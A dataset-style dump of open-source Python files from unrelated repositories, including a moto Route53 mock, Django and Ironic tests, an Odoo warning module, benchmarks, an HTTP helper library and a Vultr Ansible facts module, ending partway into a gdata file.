repo_name (stringlengths 5-100) | ref (stringlengths 12-67) | path (stringlengths 4-244) | copies (stringlengths 1-8) | content (stringlengths 0-1.05M ⌀) |
---|---|---|---|---|
GbalsaC/bitnamiP | refs/heads/master | venv/lib/python2.7/site-packages/moto/route53/models.py | 3 | from moto.core import BaseBackend
from moto.core.utils import get_random_hex
class FakeZone(object):
def __init__(self, name, id):
self.name = name
self.id = id
self.rrsets = {}
def add_rrset(self, name, rrset):
self.rrsets[name] = rrset
def delete_rrset(self, name):
self.rrsets.pop(name, None)
class Route53Backend(BaseBackend):
def __init__(self):
self.zones = {}
def create_hosted_zone(self, name):
new_id = get_random_hex()
new_zone = FakeZone(name, new_id)
self.zones[new_id] = new_zone
return new_zone
def get_all_hosted_zones(self):
return self.zones.values()
def get_hosted_zone(self, id):
return self.zones.get(id)
def delete_hosted_zone(self, id):
zone = self.zones.get(id)
if zone:
del self.zones[id]
return zone
return None
route53_backend = Route53Backend()
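# Hypothetical usage sketch (not part of moto itself; it exercises only the methods
# defined above, and the record-set payload is illustrative):
#
#   zone = route53_backend.create_hosted_zone("example.com")
#   zone.add_rrset("www.example.com", {"Type": "A", "Value": "192.0.2.1"})
#   assert route53_backend.get_hosted_zone(zone.id) is zone
#   route53_backend.delete_hosted_zone(zone.id)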
|
2013Commons/hue | refs/heads/master | desktop/core/ext-py/Django-1.4.5/tests/regressiontests/localflavor/ch/tests.py | 33 | from django.contrib.localflavor.ch.forms import (CHZipCodeField,
CHPhoneNumberField, CHIdentityCardNumberField, CHStateSelect)
from django.test import SimpleTestCase
class CHLocalFlavorTests(SimpleTestCase):
def test_CHStateSelect(self):
f = CHStateSelect()
out = u'''<select name="state">
<option value="AG" selected="selected">Aargau</option>
<option value="AI">Appenzell Innerrhoden</option>
<option value="AR">Appenzell Ausserrhoden</option>
<option value="BS">Basel-Stadt</option>
<option value="BL">Basel-Land</option>
<option value="BE">Berne</option>
<option value="FR">Fribourg</option>
<option value="GE">Geneva</option>
<option value="GL">Glarus</option>
<option value="GR">Graubuenden</option>
<option value="JU">Jura</option>
<option value="LU">Lucerne</option>
<option value="NE">Neuchatel</option>
<option value="NW">Nidwalden</option>
<option value="OW">Obwalden</option>
<option value="SH">Schaffhausen</option>
<option value="SZ">Schwyz</option>
<option value="SO">Solothurn</option>
<option value="SG">St. Gallen</option>
<option value="TG">Thurgau</option>
<option value="TI">Ticino</option>
<option value="UR">Uri</option>
<option value="VS">Valais</option>
<option value="VD">Vaud</option>
<option value="ZG">Zug</option>
<option value="ZH">Zurich</option>
</select>'''
self.assertHTMLEqual(f.render('state', 'AG'), out)
def test_CHZipCodeField(self):
error_format = [u'Enter a zip code in the format XXXX.']
valid = {
'1234': '1234',
'0000': '0000',
}
invalid = {
'800x': error_format,
'80 00': error_format,
}
self.assertFieldOutput(CHZipCodeField, valid, invalid)
def test_CHPhoneNumberField(self):
error_format = [u'Phone numbers must be in 0XX XXX XX XX format.']
valid = {
'012 345 67 89': '012 345 67 89',
'0123456789': '012 345 67 89',
}
invalid = {
'01234567890': error_format,
'1234567890': error_format,
}
self.assertFieldOutput(CHPhoneNumberField, valid, invalid)
def test_CHIdentityCardNumberField(self):
error_format = [u'Enter a valid Swiss identity or passport card number in X1234567<0 or 1234567890 format.']
valid = {
'C1234567<0': 'C1234567<0',
'2123456700': '2123456700',
}
invalid = {
'C1234567<1': error_format,
'2123456701': error_format,
}
self.assertFieldOutput(CHIdentityCardNumberField, valid, invalid)
|
numerigraphe/odoo | refs/heads/8.0 | addons/warning/warning.py | 243 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
from openerp.tools.translate import _
WARNING_MESSAGE = [
('no-message','No Message'),
('warning','Warning'),
('block','Blocking Message')
]
WARNING_HELP = _('Selecting the "Warning" option will notify the user with the message. Selecting "Blocking Message" will throw an exception with the message and block the flow. The message has to be written in the next field.')
class res_partner(osv.osv):
_inherit = 'res.partner'
_columns = {
'sale_warn' : fields.selection(WARNING_MESSAGE, 'Sales Order', help=WARNING_HELP, required=True),
'sale_warn_msg' : fields.text('Message for Sales Order'),
'purchase_warn' : fields.selection(WARNING_MESSAGE, 'Purchase Order', help=WARNING_HELP, required=True),
'purchase_warn_msg' : fields.text('Message for Purchase Order'),
'picking_warn' : fields.selection(WARNING_MESSAGE, 'Stock Picking', help=WARNING_HELP, required=True),
'picking_warn_msg' : fields.text('Message for Stock Picking'),
'invoice_warn' : fields.selection(WARNING_MESSAGE, 'Invoice', help=WARNING_HELP, required=True),
'invoice_warn_msg' : fields.text('Message for Invoice'),
}
_defaults = {
'sale_warn' : 'no-message',
'purchase_warn' : 'no-message',
'picking_warn' : 'no-message',
'invoice_warn' : 'no-message',
}
class sale_order(osv.osv):
_inherit = 'sale.order'
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value':{'partner_invoice_id': False, 'partner_shipping_id':False, 'payment_term' : False}}
warning = {}
title = False
message = False
partner = self.pool.get('res.partner').browse(cr, uid, part, context=context)
if partner.sale_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.sale_warn_msg
warning = {
'title': title,
'message': message,
}
if partner.sale_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = super(sale_order, self).onchange_partner_id(cr, uid, ids, part, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+ result['warning']['title'] or result['warning']['title']
warning['message'] = message and message + ' ' + result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class purchase_order(osv.osv):
_inherit = 'purchase.order'
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value':{'partner_address_id': False}}
warning = {}
title = False
message = False
partner = self.pool.get('res.partner').browse(cr, uid, part, context=context)
if partner.purchase_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.purchase_warn_msg
warning = {
'title': title,
'message': message
}
if partner.purchase_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = super(purchase_order, self).onchange_partner_id(cr, uid, ids, part, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+ result['warning']['title'] or result['warning']['title']
warning['message'] = message and message + ' ' + result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class account_invoice(osv.osv):
_inherit = 'account.invoice'
def onchange_partner_id(self, cr, uid, ids, type, partner_id,
date_invoice=False, payment_term=False,
partner_bank_id=False, company_id=False,
context=None):
if not partner_id:
return {'value': {
'account_id': False,
'payment_term': False,
}
}
warning = {}
title = False
message = False
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
if partner.invoice_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.invoice_warn_msg
warning = {
'title': title,
'message': message
}
if partner.invoice_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = super(account_invoice, self).onchange_partner_id(cr, uid, ids, type, partner_id,
date_invoice=date_invoice, payment_term=payment_term,
partner_bank_id=partner_bank_id, company_id=company_id, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+ result['warning']['title'] or result['warning']['title']
warning['message'] = message and message + ' ' + result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class stock_picking(osv.osv):
_inherit = 'stock.picking'
def onchange_partner_in(self, cr, uid, ids, partner_id=None, context=None):
if not partner_id:
return {}
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
warning = {}
title = False
message = False
if partner.picking_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.picking_warn_msg
warning = {
'title': title,
'message': message
}
if partner.picking_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = {'value': {}}
if warning:
result['warning'] = warning
return result
class product_product(osv.osv):
_inherit = 'product.template'
_columns = {
'sale_line_warn' : fields.selection(WARNING_MESSAGE,'Sales Order Line', help=WARNING_HELP, required=True),
'sale_line_warn_msg' : fields.text('Message for Sales Order Line'),
'purchase_line_warn' : fields.selection(WARNING_MESSAGE,'Purchase Order Line', help=WARNING_HELP, required=True),
'purchase_line_warn_msg' : fields.text('Message for Purchase Order Line'),
}
_defaults = {
'sale_line_warn' : 'no-message',
'purchase_line_warn' : 'no-message',
}
class sale_order_line(osv.osv):
_inherit = 'sale.order.line'
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False,
fiscal_position=False, flag=False, warehouse_id=False, context=None):
warning = {}
if not product:
return {'value': {'th_weight' : 0, 'product_packaging': False,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
product_obj = self.pool.get('product.product')
product_info = product_obj.browse(cr, uid, product)
title = False
message = False
if product_info.sale_line_warn != 'no-message':
title = _("Warning for %s") % product_info.name
message = product_info.sale_line_warn_msg
warning['title'] = title
warning['message'] = message
if product_info.sale_line_warn == 'block':
return {'value': {'product_id': False}, 'warning': warning}
result = super(sale_order_line, self).product_id_change_with_wh( cr, uid, ids, pricelist, product, qty,
uom, qty_uos, uos, name, partner_id,
lang, update_tax, date_order, packaging, fiscal_position, flag, warehouse_id=warehouse_id, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+result['warning']['title'] or result['warning']['title']
warning['message'] = message and message +'\n\n'+result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class purchase_order_line(osv.osv):
_inherit = 'purchase.order.line'
def onchange_product_id(self,cr, uid, ids, pricelist, product, qty, uom,
partner_id, date_order=False, fiscal_position_id=False, date_planned=False,
name=False, price_unit=False, state='draft', context=None):
warning = {}
if not product:
return {'value': {'price_unit': price_unit or 0.0, 'name': name or '', 'product_uom' : uom or False}, 'domain':{'product_uom':[]}}
product_obj = self.pool.get('product.product')
product_info = product_obj.browse(cr, uid, product)
title = False
message = False
if product_info.purchase_line_warn != 'no-message':
title = _("Warning for %s") % product_info.name
message = product_info.purchase_line_warn_msg
warning['title'] = title
warning['message'] = message
if product_info.purchase_line_warn == 'block':
return {'value': {'product_id': False}, 'warning': warning}
result = super(purchase_order_line, self).onchange_product_id(cr, uid, ids, pricelist, product, qty, uom,
partner_id, date_order=date_order, fiscal_position_id=fiscal_position_id, date_planned=date_planned, name=name, price_unit=price_unit, state=state, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+result['warning']['title'] or result['warning']['title']
warning['message'] = message and message +'\n\n'+result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
anntzer/scikit-learn | refs/heads/main | asv_benchmarks/benchmarks/metrics.py | 12 | from sklearn.metrics.pairwise import pairwise_distances
from .common import Benchmark
from .datasets import _random_dataset
class PairwiseDistancesBenchmark(Benchmark):
"""
Benchmarks for pairwise distances.
"""
param_names = ['representation', 'metric', 'n_jobs']
params = (['dense', 'sparse'],
['cosine', 'euclidean', 'manhattan', 'correlation'],
Benchmark.n_jobs_vals)
def setup(self, *params):
representation, metric, n_jobs = params
if representation == 'sparse' and metric == 'correlation':
raise NotImplementedError
if Benchmark.data_size == 'large':
if metric in ('manhattan', 'correlation'):
n_samples = 8000
else:
n_samples = 24000
else:
if metric in ('manhattan', 'correlation'):
n_samples = 4000
else:
n_samples = 12000
data = _random_dataset(n_samples=n_samples,
representation=representation)
self.X, self.X_val, self.y, self.y_val = data
self.pdist_params = {'metric': metric,
'n_jobs': n_jobs}
def time_pairwise_distances(self, *args):
pairwise_distances(self.X, **self.pdist_params)
def peakmem_pairwise_distances(self, *args):
pairwise_distances(self.X, **self.pdist_params)
|
michelts/lettuce | refs/heads/master | tests/integration/lib/Django-1.3/django/core/management/commands/reset.py | 229 | from optparse import make_option
from django.conf import settings
from django.core.management.base import AppCommand, CommandError
from django.core.management.color import no_style
from django.core.management.sql import sql_reset
from django.db import connections, transaction, DEFAULT_DB_ALIAS
class Command(AppCommand):
option_list = AppCommand.option_list + (
make_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.'),
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to reset. '
'Defaults to the "default" database.'),
)
help = "Executes ``sqlreset`` for the given app(s) in the current database."
args = '[appname ...]'
output_transaction = True
def handle_app(self, app, **options):
# This command breaks a lot and should be deprecated
import warnings
warnings.warn(
'This command has been deprecated. The command ``flush`` can be used to delete everything. You can also use ALTER TABLE or DROP TABLE statements manually.',
PendingDeprecationWarning
)
using = options.get('database', DEFAULT_DB_ALIAS)
connection = connections[using]
app_name = app.__name__.split('.')[-2]
self.style = no_style()
sql_list = sql_reset(app, self.style, connection)
if options.get('interactive'):
confirm = raw_input("""
You have requested a database reset.
This will IRREVERSIBLY DESTROY any data for
the "%s" application in the database "%s".
Are you sure you want to do this?
Type 'yes' to continue, or 'no' to cancel: """ % (app_name, connection.settings_dict['NAME']))
else:
confirm = 'yes'
if confirm == 'yes':
try:
cursor = connection.cursor()
for sql in sql_list:
cursor.execute(sql)
except Exception, e:
transaction.rollback_unless_managed()
raise CommandError("""Error: %s couldn't be reset. Possible reasons:
* The database isn't running or isn't configured correctly.
* At least one of the database tables doesn't exist.
* The SQL was invalid.
Hint: Look at the output of 'django-admin.py sqlreset %s'. That's the SQL this command wasn't able to run.
The full error: %s""" % (app_name, app_name, e))
transaction.commit_unless_managed()
else:
print "Reset cancelled."
|
tomsimonart/GLM-web-interface | refs/heads/master | pluginstall.py | 1 | #!/usr/bin/env python3
print('plugin installer, TBC')
|
MattDevo/edk2 | refs/heads/master | AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Imports.py | 6 | from pybench import Test
# First imports:
import os
import package.submodule
class SecondImport(Test):
version = 2.0
operations = 5 * 5
rounds = 40000
def test(self):
for i in xrange(self.rounds):
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
def calibrate(self):
for i in xrange(self.rounds):
pass
class SecondPackageImport(Test):
version = 2.0
operations = 5 * 5
rounds = 40000
def test(self):
for i in xrange(self.rounds):
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
def calibrate(self):
for i in xrange(self.rounds):
pass
class SecondSubmoduleImport(Test):
version = 2.0
operations = 5 * 5
rounds = 40000
def test(self):
for i in xrange(self.rounds):
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
def calibrate(self):
for i in xrange(self.rounds):
pass
|
concurrence/concurrence | refs/heads/master | lib/concurrence/http/__init__.py | 1 | # Copyright (C) 2009, Hyves (Startphone Ltd.)
#
# This module is part of the Concurrence Framework and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
class HTTPError(Exception): pass
class HTTPRequest(object):
"""A class representing a HTTP request."""
def __init__(self, path = None, method = None, host = None):
"""Create a new http request for *path* using *method* to *host*."""
self.path = path
self.method = method
self.host = host
self.headers = []
self._body = None
def add_header(self, key, value):
"""Adds a new header to the request with name *key* and given *value*."""
self.headers.append((key, value))
def _set_body(self, body):
if body is not None:
assert type(body) == str
self.add_header('Content-Length', str(len(body)))
self._body = body
def _get_body(self):
return self._body
body = property(_get_body, _set_body, doc = 'sets *body* data for the request')
class HTTPResponse(object):
"""Represents a HTTP Response."""
def __init__(self):
self.headers = []
self.status = ''
self.iter = None
@property
def status_code(self):
"""Returns the HTTP response code as an integer."""
return int(self.status.split()[1])
@property
def status_reason(self):
"""Returns the reason part of the HTTP response line as a string."""
return self.status.split(None, 2)[2]  # keep multi-word reasons like "Not Found" intact
def get_header(self, key, default = None):
"""Gets the HTTP response header with the given case-insensitive *key*. Returns *default*
if the header is not found."""
key = key.lower()
for (_key, value) in self.headers:
if key == _key.lower():
return value
return default
def add_header(self, key, value):
"""Adds a new header to the response with name *key* and given *value*."""
self.headers.append((key, value))
@property
def body(self):
"""Returns the body of the response as a string."""
return ''.join(list(self.iter))
def __iter__(self):
return iter(self.iter)
from concurrence.http.server import WSGIServer
from concurrence.http.client import HTTPConnection
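# Minimal usage sketch (hypothetical; based only on the classes above, while the actual
# request/response cycle is driven by the HTTPConnection imported above):
#
#   request = HTTPRequest(path='/index.html', method='GET', host='example.org')
#   request.add_header('Accept', 'text/html')
#   request.body = 'payload'  # the body property also sets the Content-Length header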
|
Chasego/codirit | refs/heads/master | leetcode/202-Happy-Number/solution.py | 4 | class Solution:
def isHappy(self, n: int) -> bool:
visited = set([n])
while n != 1:
new_n = 0
while n > 0:
new_n += (n % 10) ** 2
n = int(n/10)
if new_n in visited:
return False
visited.add(new_n)
n = new_n
return True
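# Illustrative checks (a standard LeetCode harness, not shown here, would call isHappy):
#   Solution().isHappy(19)  # True: 1+81=82, 64+4=68, 36+64=100, 1+0+0=1
#   Solution().isHappy(2)   # False: the digit-square sequence falls into a cycle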
|
redhat-openstack/ironic | refs/heads/master-patches | ironic/tests/api/v1/test_utils.py | 2 | # -*- encoding: utf-8 -*-
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_utils import uuidutils
import pecan
from six.moves import http_client
from webob.static import FileIter
import wsme
from ironic.api.controllers.v1 import utils
from ironic.common import exception
from ironic import objects
from ironic.tests.api import utils as test_api_utils
from ironic.tests import base
CONF = cfg.CONF
class TestApiUtils(base.TestCase):
def test_validate_limit(self):
limit = utils.validate_limit(10)
self.assertEqual(10, limit)
# max limit
limit = utils.validate_limit(999999999)
self.assertEqual(CONF.api.max_limit, limit)
# negative
self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, -1)
# zero
self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, 0)
def test_validate_sort_dir(self):
sort_dir = utils.validate_sort_dir('asc')
self.assertEqual('asc', sort_dir)
# invalid sort_dir parameter
self.assertRaises(wsme.exc.ClientSideError,
utils.validate_sort_dir,
'fake-sort')
def test_check_for_invalid_fields(self):
requested = ['field_1', 'field_3']
supported = ['field_1', 'field_2', 'field_3']
utils.check_for_invalid_fields(requested, supported)
def test_check_for_invalid_fields_fail(self):
requested = ['field_1', 'field_4']
supported = ['field_1', 'field_2', 'field_3']
self.assertRaises(exception.InvalidParameterValue,
utils.check_for_invalid_fields,
requested, supported)
@mock.patch.object(pecan, 'request', spec_set=['version'])
def test_check_allow_specify_fields(self, mock_request):
mock_request.version.minor = 8
self.assertIsNone(utils.check_allow_specify_fields(['foo']))
@mock.patch.object(pecan, 'request', spec_set=['version'])
def test_check_allow_specify_fields_fail(self, mock_request):
mock_request.version.minor = 7
self.assertRaises(exception.NotAcceptable,
utils.check_allow_specify_fields, ['foo'])
@mock.patch.object(pecan, 'request', spec_set=['version'])
def test_allow_links_node_states_and_driver_properties(self, mock_request):
mock_request.version.minor = 14
self.assertTrue(utils.allow_links_node_states_and_driver_properties())
mock_request.version.minor = 10
self.assertFalse(utils.allow_links_node_states_and_driver_properties())
class TestNodeIdent(base.TestCase):
def setUp(self):
super(TestNodeIdent, self).setUp()
self.valid_name = 'my-host'
self.valid_uuid = uuidutils.generate_uuid()
self.invalid_name = 'Mr Plow'
self.node = test_api_utils.post_get_test_node()
@mock.patch.object(pecan, 'request')
def test_allow_node_logical_names_pre_name(self, mock_pecan_req):
mock_pecan_req.version.minor = 1
self.assertFalse(utils.allow_node_logical_names())
@mock.patch.object(pecan, 'request')
def test_allow_node_logical_names_post_name(self, mock_pecan_req):
mock_pecan_req.version.minor = 5
self.assertTrue(utils.allow_node_logical_names())
@mock.patch("pecan.request")
def test_is_valid_node_name(self, mock_pecan_req):
mock_pecan_req.version.minor = 10
self.assertTrue(utils.is_valid_node_name(self.valid_name))
self.assertFalse(utils.is_valid_node_name(self.invalid_name))
self.assertFalse(utils.is_valid_node_name(self.valid_uuid))
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_expect_uuid(self, mock_gbn, mock_gbu, mock_anln,
mock_pr):
mock_anln.return_value = True
self.node['uuid'] = self.valid_uuid
mock_gbu.return_value = self.node
self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))
self.assertEqual(1, mock_gbu.call_count)
self.assertEqual(0, mock_gbn.call_count)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_expect_name(self, mock_gbn, mock_gbu, mock_anln,
mock_pr):
mock_pr.version.minor = 10
mock_anln.return_value = True
self.node['name'] = self.valid_name
mock_gbn.return_value = self.node
self.assertEqual(self.node, utils.get_rpc_node(self.valid_name))
self.assertEqual(0, mock_gbu.call_count)
self.assertEqual(1, mock_gbn.call_count)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_invalid_name(self, mock_gbn, mock_gbu,
mock_anln, mock_pr):
mock_pr.version.minor = 10
mock_anln.return_value = True
self.assertRaises(exception.InvalidUuidOrName,
utils.get_rpc_node,
self.invalid_name)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_by_uuid_no_logical_name(self, mock_gbn, mock_gbu,
mock_anln, mock_pr):
# allow_node_logical_name() should have no effect
mock_anln.return_value = False
self.node['uuid'] = self.valid_uuid
mock_gbu.return_value = self.node
self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))
self.assertEqual(1, mock_gbu.call_count)
self.assertEqual(0, mock_gbn.call_count)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_by_name_no_logical_name(self, mock_gbn, mock_gbu,
mock_anln, mock_pr):
mock_anln.return_value = False
self.node['name'] = self.valid_name
mock_gbn.return_value = self.node
self.assertRaises(exception.NodeNotFound,
utils.get_rpc_node,
self.valid_name)
class TestVendorPassthru(base.TestCase):
def test_method_not_specified(self):
self.assertRaises(wsme.exc.ClientSideError,
utils.vendor_passthru, 'fake-ident',
None, 'fake-topic', data='fake-data')
@mock.patch.object(pecan, 'request',
spec_set=['method', 'context', 'rpcapi'])
def _vendor_passthru(self, mock_request, async=True,
driver_passthru=False):
return_value = {'return': 'SpongeBob', 'async': async, 'attach': False}
mock_request.method = 'post'
mock_request.context = 'fake-context'
passthru_mock = None
if driver_passthru:
passthru_mock = mock_request.rpcapi.driver_vendor_passthru
else:
passthru_mock = mock_request.rpcapi.vendor_passthru
passthru_mock.return_value = return_value
response = utils.vendor_passthru('fake-ident', 'squarepants',
'fake-topic', data='fake-data',
driver_passthru=driver_passthru)
passthru_mock.assert_called_once_with(
'fake-context', 'fake-ident', 'squarepants', 'POST',
'fake-data', 'fake-topic')
self.assertIsInstance(response, wsme.api.Response)
self.assertEqual('SpongeBob', response.obj)
self.assertEqual(response.return_type, wsme.types.Unset)
sc = http_client.ACCEPTED if async else http_client.OK
self.assertEqual(sc, response.status_code)
def test_vendor_passthru_async(self):
self._vendor_passthru()
def test_vendor_passthru_sync(self):
self._vendor_passthru(async=False)
def test_driver_vendor_passthru_async(self):
self._vendor_passthru(driver_passthru=True)
def test_driver_vendor_passthru_sync(self):
self._vendor_passthru(async=False, driver_passthru=True)
@mock.patch.object(pecan, 'response', spec_set=['app_iter'])
@mock.patch.object(pecan, 'request',
spec_set=['method', 'context', 'rpcapi'])
def _test_vendor_passthru_attach(self, return_value, expct_return_value,
mock_request, mock_response):
return_ = {'return': return_value, 'async': False, 'attach': True}
mock_request.method = 'get'
mock_request.context = 'fake-context'
mock_request.rpcapi.driver_vendor_passthru.return_value = return_
response = utils.vendor_passthru('fake-ident', 'bar',
'fake-topic', data='fake-data',
driver_passthru=True)
mock_request.rpcapi.driver_vendor_passthru.assert_called_once_with(
'fake-context', 'fake-ident', 'bar', 'GET',
'fake-data', 'fake-topic')
# Assert file was attached to the response object
self.assertIsInstance(mock_response.app_iter, FileIter)
self.assertEqual(expct_return_value,
mock_response.app_iter.file.read())
# Assert response message is none
self.assertIsInstance(response, wsme.api.Response)
self.assertIsNone(response.obj)
self.assertIsNone(response.return_type)
self.assertEqual(http_client.OK, response.status_code)
def test_vendor_passthru_attach(self):
self._test_vendor_passthru_attach('foo', b'foo')
def test_vendor_passthru_attach_unicode_to_byte(self):
self._test_vendor_passthru_attach(u'não', b'n\xc3\xa3o')
def test_vendor_passthru_attach_byte_to_byte(self):
self._test_vendor_passthru_attach(b'\x00\x01', b'\x00\x01')
|
richardcs/ansible | refs/heads/devel | lib/ansible/modules/cloud/vultr/vultr_startup_script_facts.py | 27 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, Yanis Guenane <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_startup_script_facts
short_description: Gather facts about the Vultr startup scripts available.
description:
- Gather facts about vultr_startup_scripts available.
version_added: "2.7"
author: "Yanis Guenane (@Spredzy)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Gather Vultr startup scripts facts
local_action:
module: vultr_startup_script_facts
- name: Print the gathered facts
debug:
var: ansible_facts.vultr_startup_script_facts
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modifications
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: string
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: string
sample: "https://api.vultr.com"
vultr_startup_script_facts:
description: Response from Vultr API
returned: success
type: complex
contains:
"vultr_startup_script_facts": [
{
"date_created": "2018-07-19 08:38:36",
"date_modified": "2018-07-19 08:38:36",
"id": 327133,
"name": "lolo",
"script": "#!/bin/bash\necho Hello World > /root/hello",
"type": "boot"
}
]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrStartupScriptFacts(Vultr):
def __init__(self, module):
super(AnsibleVultrStartupScriptFacts, self).__init__(module, "vultr_startup_script_facts")
self.returns = {
"SCRIPTID": dict(key='id', convert_to='int'),
"date_created": dict(),
"date_modified": dict(),
"name": dict(),
"script": dict(),
"type": dict(),
}
def get_startupscripts(self):
return self.api_query(path="/v1/startupscript/list")
def parse_startupscript_list(startupscripts_list):
if not startupscripts_list:
return []
return [startupscript for id, startupscript in startupscripts_list.items()]
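# Illustrative sketch (the dict shape is an assumption about the Vultr
# /v1/startupscript/list response; the values are made up):
#   parse_startupscript_list({'327133': {'SCRIPTID': '327133', 'name': 'lolo'}})
#   # -> [{'SCRIPTID': '327133', 'name': 'lolo'}]
#   parse_startupscript_list({})  # -> []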
def main():
argument_spec = vultr_argument_spec()
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
startupscript_facts = AnsibleVultrStartupScriptFacts(module)
result = startupscript_facts.get_result(parse_startupscript_list(startupscript_facts.get_startupscripts()))
ansible_facts = {
'vultr_startup_script_facts': result['vultr_startup_script_facts']
}
module.exit_json(ansible_facts=ansible_facts, **result)
if __name__ == '__main__':
main()
|
louietsai/python-for-android | refs/heads/master | python3-alpha/extra_modules/gdata/finance/data.py | 125 | #!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the data classes of the Google Finance Portfolio Data API"""
__author__ = '[email protected] (Jeff Scudder)'
import atom.core
import atom.data
import gdata.data
